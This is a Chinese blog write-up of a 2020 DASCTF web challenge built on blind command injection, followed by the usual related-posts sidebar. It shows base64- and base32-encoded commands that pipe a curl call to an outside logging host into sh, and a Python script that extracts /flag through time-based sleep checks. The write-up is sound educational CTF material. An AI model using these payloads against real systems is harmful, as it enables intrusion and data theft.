2020年DASCTF五月线上赛-WEB-小红花

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量1.1k 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40557223/article/details/106297673
版权

小红花

很明显是命令执行,但肯定有过滤.

首先看函数shell_exec他会执行系统命令,并把执行结果返回出来。但看提示似乎没有把返回结果打印测试后也证实了这个想法。

image-20200523110918694

那么就首先尝试外带了。

dnslog外带-失败

尝试过以后payload都没有成功。听别人说之前有人成功过是因为非预期后来再进行尝试就没有成功了。

echo Y3VybCBibC50ZXN0LmRuc2xvZy5saW5rIA==|base64 -d |sh
echo MN2XE3BAMJWC45DFON2C4ZDOONWG6ZZONRUW42ZA |base32 -d |sh

image-20200523111340360

盲注

暂且叫这个名字吧。通过if语句来判断字符正确如正确则延时,通过时间来判断字符。和sql盲注一个意思。

import requests
import string
import urllib.parse
import time
char = string.digits+string.ascii_letters
char += "{}-_"


result = ""

for n in range(1,40):

	for i in char:
		payload = "if [ `cut -c {} /flag` = \"{}\" ];then sleep 7;fi".format(n,i)
		paylaod = urllib.parse.quote(payload)
		url = "http://183.129.189.60:10069/?imagin={}".format(payload)
		# print(url)
		# print(url)
		# try:
		start = time.time()
		try:
			html = requests.get(url,timeout=8).text
			
			#print(start)
			
			if html:
				if int(time.time())-int(start) >5:
					result += i
		except:
			print(n,i)
	print(result)



		# print(html)
		# except:
		#     print(i)
Bcdlbgm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021 DASCTF X BUUOJ 五月联动WP
lifanxin的博客
05-30 1698
DASCTF X BUUOJ 五月联动WP概述pwnDASCTF_X_BUUOJ_2021_ticketDASCTF_X_BUUOJ_2021_cardre总结 概述   这个五月我又参加了一次不留痕迹的ctf比赛,之所以叫不留痕迹,是因为总是拿不到好的名次????,比赛结束前1小时还能苟进前10,不过后面还是被反超了。不好在安慰自己,新手嘛,刚刚上路,稳扎稳打,持续努力,定有收获。   这个比赛完整环境可以在buuoj上找到,简单分析一下题目分布情况,pwn 2道,re 2道,web 2道,crypto
小红花头像生成.apk
05-16
2021送你一朵小红花,一键生成2021小红花头像,助你在新的一大吉大利,仍然斗志昂扬充满希望的迎接2021的每一天。
DASCTF 5月 Re - ViQinere
T_Luffy的博客
05-24 546
没太有时间打CTF了,就做了一个题,看到师傅们都是逆出结果的,写一下这题我的新奇思路吧,比较节省时间。 ViQinere ida分析发现是对flag文件中的明文进行了处理,创建一个flag文件,本来想添加测试串测试自己的解密思路是否正确,运行,得到测试加密的密文(常规的思路可以开逆了,逻辑也是比较清晰,大师傅们都写了,不再重复。)我手贱把密文又写进了flag文件,然后运行逆回了明文,太好了,完事了。。(逃。。菜????的快乐就是这么简单 我nc拿到了密文,将密文写到了flag文件,运行,得到flag…
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 881
简单题
[DASCTF 2023 & 0X401七月暑期挑战赛] Web方向部分题 详细Writeup
Leaf_initial的博客
08-06 470
对于不是XXE盲注得到密码登录而是通过万能密码登入的话,由于登录的账户不是admin,每执行一次操作,session就会销毁一次,所以在每次操作之前,都要把登录的包重新发一遍,重置session。__file__是从中加载模块的文件的路径名(如果它是从文件加载的)。这段代码是一个Django项目的设置文件(settings.py),它包含了配置项目的各种设置,如数据库连接、模板路径、国际化设置等。这里一开始没有弹出来,说是生成payload时的python版本,pickle包版本等等,将版本换成了。
2021-DASCTF-三月赛-Writeup
热门推荐
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒赛高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
安恒七月赛DASCTFweb之sqli
Firebasky的博客
07-25 750
sqli 打开题目是常见的id注入,输入单引号发现报错,输入#成功过滤 使用sql语句应该是 select * from admin where id=''; 经过测试发现有3个字段(因为这里过滤了空格通过/**/绕过) 10'union/**/select/**/version(),database(),user()# 查看到database()是sqlidb 在测试union select注入的时候发现了过滤原则 preg_match("/;|benchmark|\^|if|[\s]|in|case
2020DASCTF五月线上赛-ViQinere
hhcjl的博客
05-25 715
2020DASCTF五月线上赛-ViQinere 2020DASCTF五月线上赛-ViQinere 下载后IDA打开: 主函数 加密函数 程序逻辑为读取./flag中的字符串进行加密处理,然后输出。 在程序目录下建立flag文件测试。文件中写入abcdefg123,运行程序得到加密字符串gyewimg123 将加密的字符串再写入flag文件运行,得到abcdefg123。发现加解密为同一算法 nc连接远程服务器获取加密后的字符串。 > ncat 183.129.189.60 10087
云计算-中药方剂桃仁红花煎的计算药理学研究.pdf
07-08
桃仁红花煎是传统中医方剂,源自《素庵医案》,主要用于治疗心血管疾病。该方由桃仁、红花、当归、香附、延胡索、赤芍、川芎、丹参、青皮和生地黄这十种草药组成。尽管临床实践表明该方具有良好的疗效,但其药理作用...
行业分类-设备装置-一种红花注射液中大分子物质的检测方法.zip
08-22
在IT行业中,尽管主要关注的是信息技术、软件开发和硬件设备,但这个特定的文件"行业分类-设备装置-一种红花注射液中大分子物质的检测方法.zip"却与生物医学领域相关,尤其是涉及到医疗设备和分析技术。尽管这不是...
小红花电脑房课堂教学助手jfHelp
04-01
小红花电脑房课堂教学助手jfHelp》20230331版说明书 《小红花电脑房教学助手jfHelp》是适合多学校、多级、多班级、多电脑房、多教师开展电脑房授课管理的软件,下面简称《小红花》。程序由两部分组成,一是学生...
cpu(BCD码的加法)
06-21
cpu(BCD码的加法)
论文研究 - 红花综合营养管理(
06-02
采用随机组成的完整设计重复了五次使用不同组成的家禽垫料,农场粪便,氮和磷肥的处理,并推荐剂量作为对照。 田间试验的结果包括最大株高(174.6 cm),1穗头植物的数量(42.67),1穗头种子的数量(59.0),...
2020五月DASCTF
cwr1499640048的博客
07-01 1001
bbcrypto # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return c if __name__ == "__main__": m = 'flag{**
5月DASCTF
doudoudedi
05-24 1249
帮帮小红吧 命令盲注是我没有想到的 cat /flag |grep 'BJD{' || sleep(3); 密码bbcrypto 题目 # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill
命令执行漏洞备忘录
weixin_43610673的博客
05-27 360
PHP 5PHP 7assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。assert 是一个函数,assert 这个函数在 php 语言中是用来判断一个表达式是否成立。返回 true or false;assert 函数的参数会被执行,这跟 eval() 类似。assert函数支持动态调用(php < 7.0.29)call_user_func 与 assert连用时会受到此版本(7.2)限制。
安恒月赛2020DASCTF——四月春季赛---Web-Writeup
SopRomeo的博客
04-29 3640
比赛的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下 <?php show_source("index.php"); error_reporting(0); function write($data){ return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data){...
DASCTF-两道web题复现
臭nana的博客
05-02 2901
记录一下官方题解 Ezunserialize 打开题目看到源码 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { retu...
DASCTF六月团队赛(2020)-部分WP
~airrudder~
06-27 4070
本篇内容 MISC: Keyboard 透明度 Crypto: Gemini_Man Web: 简单的计算题1 简单的计算题2 phpuns Reverse: easy_maze 上一篇 | 目录 | 下一篇 刚打了DASCTF六月团队赛,情况虽不是很理想,但也记录一下团队解题情况。 Keyboard 尝试了很久发现没思路,搜索一下,发现是安恒DASCTF 四月战原题,甚至连flag都没变。 //查找含“keyboard”的文件 volatility -f Keyboard.raw .
编写一个生成小红花的程序
06-02
好的,生成小红花的程序可以使用Python编程语言来实现。以下是一个简单的小红花生成程序的代码示例: ```python import random # 定义小红花的部件 petals = ["红色", "粉色", "白色", "黄色", "紫色"] leaves = ["绿色", "浅绿色", "黄绿色"] stem = ["绿色", "棕色"] # 随机生成小红花的部件 petal_color = random.choice(petals) leaf_color = random.choice(leaves) stem_color = random.choice(stem) # 输出小红花的部件 print("小红花由以下部分组成:") print("花瓣:", petal_color) print("叶子:", leaf_color) print("茎:", stem_color) ``` 运行以上代码,你会得到一个随机生成的小红花的部件组成。你可以多次运行程序,每次都会得到不同的小红花部件组合。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值